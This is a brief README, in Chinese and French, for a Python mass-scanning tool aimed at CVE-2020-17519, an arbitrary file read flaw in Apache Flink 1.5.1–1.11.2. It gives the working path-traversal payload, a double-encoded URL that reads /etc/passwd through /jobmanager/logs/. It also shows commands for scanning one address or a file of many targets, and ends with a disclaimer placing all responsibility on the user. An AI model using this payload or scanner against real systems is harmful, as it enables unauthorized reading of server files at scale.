
CVE-2020-17519; Apache Flink 任意文件读取; 批量检测
Apache Flink 1.5.1 ~ 1.11.2
POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
python3 CVE-2020-17519 --help Affiche l'aide
python3 CVE-2020-17519 -u http://127.0.0.1:8080 Vérifie si une adresse est vulnérable
python3 CVE-2020-17519 -f target.txt Vérifie en masse les vulnérabilités
Toute conséquence ou perte directe ou indirecte résultant de la diffusion ou de l'utilisation des informations fournies dans ce document relève de la seule responsabilité de l'utilisateur. L'auteur n'en assume aucune responsabilité.